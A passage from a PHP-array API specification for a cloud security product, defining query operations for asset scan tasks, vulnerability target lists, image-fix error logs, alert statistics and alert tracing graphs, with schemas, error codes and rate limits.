'example' => 'IDC_PROBE_SCAN', 'title' => ''], 'TaskStatus' => ['description' => 'The status of the IDC probe scan task. Valid values:'."\n" .'- **INIT**: pending startup'."\n" .'- **START**: started'."\n" .'- **MESSAGE_SEND**: instruction sent'."\n" .'- **SUCCESS**: completed'."\n" .'- **FAIL**: failed'."\n" .'- **TIMEOUT**: timed out.', 'type' => 'string', 'example' => 'SUCCESS', 'title' => ''], 'TaskName' => ['description' => 'The task name.', 'type' => 'string', 'example' => 'IDC_PROBE_SCAN-1.1.1..124-lse_ubuntu_test1', 'title' => ''], 'RootTaskId' => ['description' => 'The root task ID.', 'type' => 'string', 'example' => '73c392f9c505129a257472a3f911d65d', 'title' => ''], 'ProcessRate' => ['description' => 'The progress percentage.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'TaskStartTime' => ['description' => 'The timestamp when the task actually started. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1633746651715', 'title' => ''], 'AssetCount' => ['description' => 'The number of assets discovered by this scan task.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'TaskEndTime' => ['description' => 'The timestamp when the task actually ended.', 'type' => 'integer', 'format' => 'int64', 'example' => '1653965680000', 'title' => ''], 'IpSegments' => ['description' => 'The CIDR blocks to scan. Multiple values are separated by commas (,).', 'type' => 'string', 'example' => '1.1.1.1/24,1.1.1.1/24', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query asset synchronization task list', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSyncAssetTaskList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSyncAssetTaskList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"24A20733-10A0-4AF6-BE6B-E3322413BB68\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 110,\\n \\"Count\\": 10\\n },\\n \\"TaskRecords\\": [\\n {\\n \\"TaskType\\": \\"IDC_PROBE_SCAN\\",\\n \\"TaskStatus\\": \\"SUCCESS\\",\\n \\"TaskName\\": \\"IDC_PROBE_SCAN-1.1.1..124-lse_ubuntu_test1\\",\\n \\"RootTaskId\\": \\"73c392f9c505129a257472a3f911d65d\\",\\n \\"ProcessRate\\": 100,\\n \\"TaskStartTime\\": 1633746651715,\\n \\"AssetCount\\": 100,\\n \\"TaskEndTime\\": 1653965680000,\\n \\"IpSegments\\": \\"1.1.1.1/24,1.1.1.1/24\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeSyncAssetTaskLogDetail' => [ 'summary' => 'Queries the details of IDC scan tasks for asset synchronization.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to display on each page when you perform a paginated query. Default value: 20. If the PageSize parameter is left empty, 20 entries are returned by default.'."\n" .'> We recommend that you do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number from which to start displaying query results. Default value: 1, which indicates that query results are displayed starting from page 1.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'TaskName', 'in' => 'query', 'schema' => ['description' => 'The task name.', 'type' => 'string', 'required' => false, 'example' => 'IDC_PROBE_SCAN-TEST_001', 'title' => ''], ], [ 'name' => 'RootTaskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the IDC scan task that you want to query. You can call the [DescribeSyncAssetTaskList](~~141932~~) operation to obtain the ID of an abnormal task.', 'type' => 'string', 'required' => false, 'example' => '7e9565f537146fdf6bfb4e01f6f08818', 'title' => ''], ], [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The timestamp of the start time.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1644027670', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The timestamp of the end time.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1668064495000', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => '0B48AB3C-84FC-424D-A01D-B9270EF46038', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of IDC scan task details displayed on each page in a paginated query. Default value: 20, which indicates that up to 20 entries of IDC scan task details are displayed on each page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of detail entries for the IDC scan task.', 'type' => 'integer', 'format' => 'int32', 'example' => '12', 'title' => ''], 'Count' => ['description' => 'The number of IDC scan task detail entries displayed on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], ], 'title' => '', 'example' => '', ], 'TaskRecordDetails' => [ 'description' => 'The list of task details.', 'type' => 'array', 'items' => [ 'description' => 'The task details.', 'type' => 'object', 'properties' => [ 'TaskReportTime' => ['description' => 'The timestamp of the report time.', 'type' => 'integer', 'format' => 'int64', 'example' => '1671614217000', 'title' => ''], 'LeafTaskId' => ['description' => 'The task ID.', 'type' => 'string', 'example' => '6c4e4c36ffc3e5919120b405c2b3****', 'title' => ''], 'UnprotectedAssetCount' => ['description' => 'The number of unprotected assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'TaskMsg' => ['description' => 'The task description.', 'type' => 'string', 'example' => 'unknown reason', 'title' => ''], 'IdcRegion' => ['description' => 'The region where the IDC server is located.', 'type' => 'string', 'example' => '浙江杭州', 'title' => ''], 'AssetCount' => ['description' => 'The total number of assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'LeafTaskStatus' => ['description' => 'The status. Valid values:'."\n" .'- **INIT**: pending start'."\n" .'- **START**: started'."\n" .'- **MESSAGE_SEND**: instructions delivered'."\n" .'- **SUCCESS**: completed'."\n" .'- **FAIL**: failed'."\n" .'- **TIMEOUT**: timed out', 'type' => 'string', 'example' => 'INIT', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query asset synchronization task details', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSyncAssetTaskLogDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSyncAssetTaskLogDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"0B48AB3C-84FC-424D-A01D-B9270EF46038\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 12,\\n \\"Count\\": 4\\n },\\n \\"TaskRecordDetails\\": [\\n {\\n \\"TaskReportTime\\": 1671614217000,\\n \\"LeafTaskId\\": \\"6c4e4c36ffc3e5919120b405c2b3****\\",\\n \\"UnprotectedAssetCount\\": 0,\\n \\"TaskMsg\\": \\"unknown reason\\",\\n \\"IdcRegion\\": \\"浙江杭州\\",\\n \\"AssetCount\\": 5,\\n \\"LeafTaskStatus\\": \\"INIT\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeTarget' => [ 'summary' => 'Queries the machine list settings for vulnerability scanning.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The query type. Set this parameter to vul.', 'type' => 'string', 'required' => false, 'example' => 'vul', 'title' => ''], ], [ 'name' => 'Config', 'in' => 'query', 'schema' => ['description' => 'The vulnerability type. Valid values:'."\n" ."\n" .'- **cms**: Web-CMS vulnerability'."\n" .'- **sys**: Windows system vulnerability'."\n" .'- **cve**: Linux software vulnerability'."\n" .'- **emg**: emergency vulnerability.', 'type' => 'string', 'required' => false, 'example' => '{"vulType":"cms"}', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'The total number of machine configuration entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '79CFF74D-E967-5407-8A78-EE03B925FDAA', 'title' => ''], 'Targets' => [ 'description' => 'The machine settings for the vulnerability type.', 'type' => 'array', 'items' => [ 'description' => 'The target object.', 'type' => 'object', 'properties' => [ 'Flag' => ['description' => 'The flag. This parameter can be empty.', 'type' => 'string', 'example' => 'del', 'title' => ''], 'Target' => ['description' => 'The target. The value is a machine UUID or a machine group ID.', 'type' => 'string', 'example' => '5c5f0169-3527-40a2-b5ff-0bc1db8f****', 'title' => ''], 'TargetType' => ['description' => 'The target type. Valid values:'."\n" ."\n" .'- **uuid**: added by individual asset'."\n" .'- **groupId**: added by server group.', 'type' => 'string', 'example' => 'uuid', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query vulnerability machine list', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeTarget'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeTarget', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"TotalCount\\": 10,\\n \\"RequestId\\": \\"79CFF74D-E967-5407-8A78-EE03B925FDAA\\",\\n \\"Targets\\": [\\n {\\n \\"Flag\\": \\"del\\",\\n \\"Target\\": \\"5c5f0169-3527-40a2-b5ff-0bc1db8f****\\",\\n \\"TargetType\\": \\"uuid\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeTaskErrorLog' => [ 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'BuildTaskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the image fix task.'."\n" ."\n" .'> Call the [DescribeImageFixTask](~~DescribeImageFixTask~~) operation to query image vulnerability fix tasks and obtain the BuildTaskId.', 'type' => 'string', 'required' => true, 'example' => 'ivf-6e520160-205d-4801-b8e9-9e7e****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The request result.', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID.', 'type' => 'string', 'example' => 'F929E952-EBFC-56C3-BD35-BF8B59024C69'], 'Logs' => [ 'description' => 'The list of error logs.', 'type' => 'array', 'items' => [ 'description' => 'The log.', 'type' => 'object', 'properties' => [ 'Text' => ['description' => 'The text content of the log.', 'type' => 'string', 'example' => 'mv: cannot move \'CentOS-Base.repo\' to \'CentOS-Base.repo.backup\': Permission denied', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query error logs of a failed image fix task', 'summary' => 'Queries the error logs of a failed image fix task.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeTaskErrorLog'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeTaskErrorLog', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F929E952-EBFC-56C3-BD35-BF8B59024C69\\",\\n \\"Logs\\": [\\n {\\n \\"Text\\": \\"mv: cannot move \'CentOS-Base.repo\' to \'CentOS-Base.repo.backup\': Permission denied\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeTotalStatistics' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'GroupId', 'in' => 'query', 'schema' => ['description' => 'The ID of the asset group to query.'."\n" .'> You can call the [DescribeAllGroups](~~130972~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '8076980', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The asset name or public IP address.', 'type' => 'string', 'required' => false, 'example' => '222.185.XX.XX', 'title' => ''], ], [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The source of the data request. Default value: **aqs**. Valid values:'."\n" .'- **sas**: The data request comes from Security Center.'."\n" .'- **aqs**: The data request comes from Server Guard.', 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'SuspiciousmediumTotal' => ['description' => 'The number of alerts with the suspicious severity level.', 'type' => 'integer', 'format' => 'int32', 'example' => '28', 'title' => ''], 'VulLaterSum' => ['description' => 'The number of medium-priority vulnerabilities.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Trojan' => ['description' => 'The number of WebShell alerts.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Suspicious' => ['description' => 'The number of Server Guard security alerts.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'HealthlowTotal' => ['description' => 'The number of baseline check items with the low urgency level.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Patch' => ['description' => 'The number of Web-CMS vulnerabilities.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'SuspiciousseriousTotal' => ['description' => 'The number of alerts with the critical severity level.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each API request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7', 'title' => ''], 'VulAsapSum' => ['description' => 'The number of high-priority vulnerabilities.', 'type' => 'integer', 'format' => 'int32', 'example' => '16', 'title' => ''], 'Online' => ['description' => 'Indicates whether the client is online. Valid values:'."\n" .'- **true**: Online.'."\n" .'- **false**: Offline.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'HealthmediumTotal' => ['description' => 'The number of medium-level baseline risks.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Newsuspicious' => ['description' => 'The number of Server Guard or Security Center alerts.'."\n" ."\n" .'> - If **Type** is **sas**, this value indicates the number of Security Center alerts.'."\n" .'> - If **Type** is **aqs**, this value indicates the number of Server Guard alerts.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Account' => ['description' => 'The number of asset logon attempts.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'VulDealedTotal' => ['description' => 'The total number of fixed vulnerabilities.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'SuspiciousTotal' => ['description' => 'The total number of security alerts.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'SuspiciousdealedTotal' => ['description' => 'The number of handled security alerts.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'HealthdealedTotal' => ['description' => 'The total number of fixed baseline check items. This field is deprecated.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'SuspicioushighTotal' => ['description' => 'The total number of security alerts. This field is deprecated.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'VulNntfSum' => ['description' => 'The number of low-priority vulnerabilities to be fixed.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'VulTotal' => ['description' => 'The number of vulnerabilities.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'SuspiciouslowTotal' => ['description' => 'The number of alerts with the reminder severity level.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'HealthTotal' => ['description' => 'The total number of baseline check items.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Vul' => ['description' => 'The number of unfixed vulnerabilities.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Health' => ['description' => 'The total number of unfixed baseline check items.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'HealthseriousTotal' => ['description' => 'The number of baseline check items with the critical urgency level. This field is deprecated.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'HealthhighTotal' => ['description' => 'The number of baseline check items with the high urgency level.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve event statistics', 'summary' => 'Retrieves event statistics information.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeTotalStatistics'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeTotalStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"SuspiciousmediumTotal\\": 28,\\n \\"VulLaterSum\\": 0,\\n \\"Trojan\\": 0,\\n \\"Suspicious\\": 0,\\n \\"HealthlowTotal\\": 0,\\n \\"Patch\\": 0,\\n \\"SuspiciousseriousTotal\\": 0,\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7\\",\\n \\"VulAsapSum\\": 16,\\n \\"Online\\": true,\\n \\"HealthmediumTotal\\": 0,\\n \\"Newsuspicious\\": 0,\\n \\"Account\\": 0,\\n \\"VulDealedTotal\\": 0,\\n \\"SuspiciousTotal\\": 0,\\n \\"SuspiciousdealedTotal\\": 0,\\n \\"HealthdealedTotal\\": 0,\\n \\"SuspicioushighTotal\\": 0,\\n \\"VulNntfSum\\": 0,\\n \\"VulTotal\\": 0,\\n \\"SuspiciouslowTotal\\": 0,\\n \\"HealthTotal\\": 0,\\n \\"Vul\\": 0,\\n \\"Health\\": 0,\\n \\"HealthseriousTotal\\": 0,\\n \\"HealthhighTotal\\": 0\\n}","type":"json"}]', ], 'DescribeTraceInfoDetail' => [ 'summary' => 'Queries the tracing information of a security alert.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request. You do not need to specify this parameter. The system automatically obtains the value.', 'type' => 'string', 'required' => false, 'example' => '127.0.0.1', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'VertexId', 'in' => 'query', 'schema' => ['description' => 'The vertex ID. You can obtain this value from the AlarmUniqueInfo parameter returned by the [DescribeSuspEvents](~~DescribeSuspEvents~~) operation.', 'type' => 'string', 'required' => true, 'example' => 'cce1d28dxxxxxxxxxxxxxxxx', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server to query.', 'type' => 'string', 'required' => true, 'example' => '1627f2d7-aaa2-4ed1-b07a-xxxxxxxxxxxxxx', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The vertex type. Set the value to **SAS_INCIDENT** for security alerts.', 'type' => 'string', 'required' => true, 'example' => 'SAS_INCIDENT', 'title' => ''], ], [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The identifier of the request source. Set the value to **sas**.', 'type' => 'string', 'required' => true, 'example' => 'sas', 'title' => ''], ], [ 'name' => 'IncidentTime', 'in' => 'query', 'schema' => ['description' => 'The detection timestamp. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1670555392000', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request.', 'type' => 'string', 'example' => '24A20733-10A0-4AF6-BE6B-XXXXXXXXX', 'title' => ''], 'TraceInfoDetail' => [ 'description' => 'The details of the trace graph.', 'type' => 'object', 'properties' => [ 'EdgeList' => [ 'description' => 'The edge information in the trace graph.', 'type' => 'array', 'items' => [ 'description' => 'The edge information in the trace graph.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the edge in the trace graph.', 'type' => 'string', 'example' => 'trigger_file_alert', 'title' => ''], 'Time' => ['description' => 'The point in time.', 'type' => 'string', 'example' => '2022-12-21 10:24:42', 'title' => ''], 'StartId' => ['description' => 'The start vertex ID of the edge in the trace graph.', 'type' => 'string', 'example' => '02b4bf933c8e3bb8b9465eee502xxxxx', 'title' => ''], 'Count' => ['description' => 'The number of occurrences.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'EndId' => ['description' => 'The end vertex ID of the edge in the trace graph.', 'type' => 'string', 'example' => 'a1d1fa39e5345dcef3f9712172cxxxxx', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'VertexList' => [ 'description' => 'The information about all vertices in the trace graph.', 'type' => 'array', 'items' => [ 'description' => 'The information about a vertex in the trace graph.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the entity represented by the vertex.', 'type' => 'string', 'example' => 'file_path', 'title' => ''], 'Time' => ['description' => 'The point in time.', 'type' => 'string', 'example' => '2022-12-21 10:24:42', 'title' => ''], 'Name' => ['description' => 'The name of the entity represented by the vertex.', 'type' => 'string', 'example' => '/usr/local/tomcat', 'title' => ''], 'Id' => ['description' => 'The vertex ID.', 'type' => 'string', 'example' => 'a1d1fa39e5345dcef3f9712172xxxxxx', 'title' => ''], 'Count' => ['description' => 'The number of occurrences.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NeighborList' => [ 'description' => 'The information about neighbor nodes.', 'type' => 'array', 'items' => [ 'description' => 'The information about neighbor nodes.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the neighbor node. The value is fixed as **alert**.', 'type' => 'string', 'example' => 'alert', 'title' => ''], 'HasMore' => ['description' => 'Indicates whether there is a next page.', 'type' => 'boolean', 'example' => 'False', 'title' => ''], 'Count' => ['description' => 'The number of neighbor nodes.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'EntityTypeList' => [ 'description' => 'The metadata configuration of vertex types.', 'type' => 'array', 'items' => [ 'description' => 'The metadata configuration record of a vertex type.', 'type' => 'object', 'properties' => [ 'DisplayColor' => ['description' => 'The rendering color of the vertex.', 'type' => 'string', 'example' => '#fff', 'title' => ''], 'DbId' => ['description' => 'Deprecated.', 'type' => 'integer', 'format' => 'int32', 'example' => 'Deprecated', 'title' => ''], 'DisplayTemplate' => ['description' => 'Deprecated.', 'type' => 'string', 'example' => '[{"name":"${logtime}","value":"$!{time}"}]', 'title' => ''], 'DisplayIcon' => ['description' => 'The icon style of the vertex.', 'type' => 'string', 'example' => 'https://img.alicdn.com/tfs/TB176P5OgDqK1RjSZSyXXaxEVXa-49-48.png', 'title' => ''], 'Limit' => ['description' => 'Deprecated.', 'type' => 'integer', 'format' => 'int32', 'example' => 'Deprecated', 'title' => ''], 'GmtCreate' => ['description' => 'The creation time.', 'type' => 'integer', 'format' => 'int64', 'example' => '2022-10-09T11:47Z', 'title' => ''], 'Offset' => ['description' => 'Deprecated.', 'type' => 'integer', 'format' => 'int32', 'example' => 'Deprecated', 'title' => ''], 'Namespace' => ['description' => 'The namespace.', 'type' => 'string', 'example' => '*', 'title' => ''], 'Name' => ['description' => 'The name of the vertex type.', 'type' => 'string', 'example' => 'Alert', 'title' => ''], 'GmtModified' => ['description' => 'The last modification time.', 'type' => 'integer', 'format' => 'int64', 'example' => '2022-10-09T11:47Z', 'title' => ''], 'Id' => ['description' => 'The ID of the vertex type record.', 'type' => 'string', 'example' => 'Alert', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'RelationTypeList' => [ 'description' => 'The metadata configuration of edge types.', 'type' => 'array', 'items' => [ 'description' => 'The metadata configuration record of an edge type.', 'type' => 'object', 'properties' => [ 'ShowType' => ['description' => 'Deprecated.', 'type' => 'string', 'example' => 'Deprecated', 'title' => ''], 'DisplayColor' => ['description' => 'The rendering color of the edge.', 'type' => 'string', 'example' => '#fff', 'title' => ''], 'Name' => ['description' => 'The name of the edge type.', 'type' => 'string', 'example' => 'file', 'title' => ''], 'Directed' => ['description' => 'Indicates whether the edge is directed. Valid values:'."\n" ."\n" .'- **1**: yes'."\n" .'- **0**: no.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RelationTypeId' => ['description' => 'The ID of the edge type.', 'type' => 'string', 'example' => 'netflow_to_process', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query tracing information', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeTraceInfoDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeTraceInfoDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": 